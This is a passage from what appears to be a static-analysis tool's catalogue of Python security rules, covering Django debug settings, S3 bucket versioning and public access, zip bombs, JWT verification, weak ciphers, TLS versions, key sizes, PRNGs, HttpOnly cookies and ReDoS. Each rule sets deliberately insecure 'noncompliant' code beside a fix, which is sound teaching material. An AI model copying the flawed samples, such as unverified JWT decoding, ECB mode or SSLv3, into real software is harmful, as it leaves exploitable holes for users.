settings.configure(DEBUG_PROPAGATE_EXCEPTIONS=True)  # Sensitive when set to True

def custom_config(config):
    settings.configure(default_settings=config, DEBUG=True)  # Sensitive

Django’s "settings.py" or "global_settings.py" configuration file:

# NOTE: The following code raises issues only if the file is named "settings.py" or "global_settings.py". This is the default
# name of Django configuration file

DEBUG = True  # Sensitive
DEBUG_PROPAGATE_EXCEPTIONS = True  # Sensitive

See

python:S6252

S3 buckets can be versioned. When the S3 bucket is unversioned it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

bucket = s3.Bucket(self, "bucket",
    versioned=False       # Sensitive
)

The default value of versioned is False so the absence of this parameter is also sensitive.

Compliant Solution

bucket = s3.Bucket(self, "bucket",
    versioned=True
)

See

python:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

For tarfile module:

import tarfile

tfile = tarfile.open("TarBomb.tar")
tfile.extractall('./tmp/')  # Sensitive
tfile.close()

For zipfile module:

import zipfile

zfile = zipfile.ZipFile('ZipBomb.zip', 'r')
zfile.extractall('./tmp/') # Sensitive
zfile.close()

Compliant Solution

For tarfile module:

import tarfile

THRESHOLD_ENTRIES = 10000
THRESHOLD_SIZE = 1000000000
THRESHOLD_RATIO = 10

totalSizeArchive = 0;
totalEntryArchive = 0;

tfile = tarfile.open("TarBomb.tar")
for entry in tfile:
  tarinfo = tfile.extractfile(entry)

  totalEntryArchive += 1
  sizeEntry = 0
  result = b''
  while True:
    sizeEntry += 1024
    totalSizeArchive += 1024

    ratio = sizeEntry / entry.size
    if ratio > THRESHOLD_RATIO:
      # ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
      break

    chunk = tarinfo.read(1024)
    if not chunk:
      break

    result += chunk

  if totalEntryArchive > THRESHOLD_ENTRIES:
    # too much entries in this archive, can lead to inodes exhaustion of the system
    break

  if totalSizeArchive > THRESHOLD_SIZE:
    # the uncompressed data size is too much for the application resource capacity
    break

tfile.close()

For zipfile module:

import zipfile

THRESHOLD_ENTRIES = 10000
THRESHOLD_SIZE = 1000000000
THRESHOLD_RATIO = 10

totalSizeArchive = 0;
totalEntryArchive = 0;

zfile = zipfile.ZipFile('ZipBomb.zip', 'r')
for zinfo in zfile.infolist():
    print('File', zinfo.filename)
    data = zfile.read(zinfo)

    totalEntryArchive += 1

    totalSizeArchive = totalSizeArchive + len(data)
    ratio = len(data) / zinfo.compress_size
    if ratio > THRESHOLD_RATIO:
      # ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
      break

    if totalSizeArchive > THRESHOLD_SIZE:
      # the uncompressed data size is too much for the application resource capacity
      break

    if totalEntryArchive > THRESHOLD_ENTRIES:
      # too much entries in this archive, can lead to inodes exhaustion of the system
      break

zfile.close()

See

python:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in PyJWT

Code examples

The following code contains an example of JWT decoding without verification of the signature.

Noncompliant code example

import jwt

jwt.decode(token, verify=False) # Noncompliant

Compliant solution

By default, verification is enabled for the method decode.

import jwt

jwt.decode(token, key, algorithms="HS256")

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

python:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Cryptodome

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

from Crypto.Cipher import DES # pycryptodome
from Cryptodome.Cipher import DES # pycryptodomex

cipher = DES.new(key, DES.MODE_OFB) # Noncompliant

Compliant solution

from Crypto.Cipher import AES # pycryptodome
from Cryptodome.Cipher import AES # pycryptodomex

cipher = AES.new(key, AES.MODE_CCM)

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

python:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in PyCrypto

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

from Crypto.Cipher import AES

AES.new(key, AES.MODE_ECB) # Noncompliant

Example with an asymmetric cipher, RSA:

from Crypto.Cipher import PKCS1_v1_5

PKCS1_v1_5.new(key) # Noncompliant

Compliant solution

Since PyCrypto is not supported anymore, another library should be used. In the current context, Cryptodome uses a similar API.

For the AES symmetric cipher, use the GCM mode:

from Crypto.Cipher import AES

AES.new(key, AES.MODE_GCM)

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

from Crypto.Cipher import PKCS1_OAEP

PKCS1_OAEP.new(key)

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

python:S5300

This rule is deprecated, and will eventually be removed.

Sending emails is security-sensitive and can expose an application to a large range of vulnerabilities.

Information Exposure

Emails often contain sensitive information which might be exposed to an attacker if he can add an arbitrary address to the recipient list.

Spamming / Phishing

Malicious user can abuse email based feature to send spam or phishing content.

Dangerous Content Injection

Emails can contain HTML and JavaScript code, thus they can be used for XSS attacks.

Email Headers Injection

Email fields such as subject, to, cc, bcc, from are set in email "headers".  Using unvalidated user input to set those fields might allow attackers to inject new line characters in headers to craft malformed SMTP requests. Although modern libraries are filtering new line character by default, user data used in email "headers" should always be validated.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Unvalidated user input are used to set email headers.
  • Email content contains data provided by users and it is not sanitized.
  • Email recipient list or body are based on user inputs.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use an email library which sanitizes headers (Flask-Mail or django.core.mail).
  • Use html escape functions to sanitize every piece of data used to in the email body.
  • Verify application logic to make sure that email base feature can not be abuse to:
    • Send arbitrary email for spamming or fishing
    • Disclose sensitive email content

Sensitive Code Example

smtplib

import smtplib

def send(from_email, to_email, msg):
  server = smtplib.SMTP('localhost', 1025)
  server.sendmail(from_email, to_email, msg) # Sensitive

Django

from django.core.mail import send_mail

def send(subject, msg, from_email, to_email):
  send_mail(subject, msg, from_email, [to_email]) # Sensitive

Flask-Mail

from flask import Flask
from flask_mail import Mail, Message

app = Flask(__name__)

def send(subject, msg, from_email, to_email):
    mail = Mail(app)
    msg = Message(subject, [to_email], body, sender=from_email)
    mail.send(msg) # Sensitive{code}

See

python:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random, strong enough or the same key is reused for a long long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations which are not secured:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

cryptography module

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305, AESGCM, AESCCM
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher


def encrypt(key):
    Fernet(key)  # Sensitive
    ChaCha20Poly1305(key)  # Sensitive
    AESGCM(key)  # Sensitive
    AESCCM(key)  # Sensitive


private_key = rsa.generate_private_key()  # Sensitive


def encrypt2(algorithm, mode, backend):
    Cipher(algorithm, mode, backend)  # Sensitive

pynacl library

from nacl.public import Box
from nacl.secret import SecretBox


def public_encrypt(secret_key, public_key):
    Box(secret_key, public_key)  # Sensitive


def secret_encrypt(key):
    SecretBox(key)  # Sensitive

See

python:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Python Standard Library

Code examples

Noncompliant code example

import ssl

ssl.SSLContext(ssl.PROTOCOL_SSLv3) # Noncompliant

Compliant solution

import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.minimum_version = ssl.TLSVersion.TLSv1_3

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

python:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

import random

random.getrandbits(1) # Sensitive
random.randint(0,9) # Sensitive
random.random()  # Sensitive

# the following functions are sadly used to generate salt by selecting characters in a string ex: "abcdefghijk"...
random.sample(['a', 'b'], 1)  # Sensitive
random.choice(['a', 'b'])  # Sensitive
random.choices(['a', 'b'])  # Sensitive

See

python:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in pyca

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = rsa.generate_private_key(key_size = 1024, backend = backend) # Noncompliant
public_key  = private_key.public_key()

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = dsa.generate_private_key(key_size = 1024, backend = backend) # Noncompliant
public_key  = private_key.public_key()

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = ec.generate_private_key(curve=ec.SECT163R2, backend=backend)  # Noncompliant
public_key  = private_key.public_key()

Compliant solution

from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = rsa.generate_private_key(key_size = 2048, backend = backend)
public_key  = private_key.public_key()
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = dsa.generate_private_key(key_size = 2048, backend = backend)
public_key  = private_key.public_key()
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.backends import default_backend

backend = default_backend()

private_key = ec.generate_private_key(curve=ec.SECT409R1, backend=backend)
public_key  = private_key.public_key()

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

python:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

Flask:

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value') # Sensitive
    return response

Compliant Solution

Flask:

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value', httponly=True) # Compliant
    return response

See

python:S4784

This rule is deprecated; use S5852, S2631 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Sensitive Code Example

Django

from django.core.validators import RegexValidator
from django.urls import re_path

RegexValidator('(a*)*b')  # Sensitive

def define_http_endpoint(view):
    re_path(r'^(a*)*b/$', view)  # Sensitive

re module

import re
from re import compile, match, search, fullmatch, split, findall, finditer, sub, subn


input = 'input string'
replacement = 'replacement'

re.compile('(a*)*b')  # Sensitive
re.match('(a*)*b', input)  # Sensitive
re.search('(a*)*b', input)  # Sensitive
re.fullmatch('(a*)*b', input)  # Sensitive
re.split('(a*)*b', input)  # Sensitive
re.findall('(a*)*b', input)  # Sensitive
re.finditer('(a*)*b',input)  # Sensitive
re.sub('(a*)*b', replacement, input)  # Sensitive
re.subn('(a*)*b', replacement, input)  # Sensitive

regex module

import regex
from regex import compile, match, search, fullmatch, split, findall, finditer, sub, subn, subf, subfn, splititer

input = 'input string'
replacement = 'replacement'

regex.subf('(a*)*b', replacement, input)  # Sensitive
regex.subfn('(a*)*b', replacement, input)  # Sensitive
regex.splititer('(a*)*b', input)  # Sensitive

regex.compile('(a*)*b')  # Sensitive
regex.match('(a*)*b', input)  # Sensitive
regex.search('(a*)*b', input)  # Sensitive
regex.fullmatch('(a*)*b', input)  # Sensitive
regex.split('(a*)*b', input)  # Sensitive
regex.findall('(a*)*b', input)  # Sensitive
regex.finditer('(a*)*b',input)  # Sensitive
regex.sub('(a*)*b', replacement, input)  # Sensitive
regex.subn('(a*)*b', replacement, input)  # Sensitive

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

python:S6281

By default S3 buckets are private, it means that only the bucket owner can access it.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies to be set on a S3 bucket the following booleans settings can be enabled:

  • block_public_acls: to block or not public ACLs to be set to the S3 bucket.
  • ignore_public_acls: to consider or not existing public ACLs set to the S3 bucket.
  • block_public_policy: to block or not public policies to be set to the S3 bucket.
  • restrict_public_buckets: to restrict or not the access to the S3 endpoints of public policies to the principals within the bucket owner account.

The other attribute BlockPublicAccess.BLOCK_ACLS only turns on block_public_acls and ignore_public_acls. The public policies can still affect the S3 bucket.

However, all of those options can be enabled by setting the block_public_access property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • block_public_acls to True to block new attempts to set public ACLs.
  • ignore_public_acls to True to block existing public ACLs.
  • block_public_policy to True to block new attempts to set public policies.
  • restrict_public_buckets to True to restrict existing public policies.

Sensitive Code Example

By default, when not set, the block_public_access is fully deactivated (nothing is blocked):

bucket = s3.Bucket(self,
    "bucket"        # Sensitive
)

This block_public_access allows public ACL to be set:

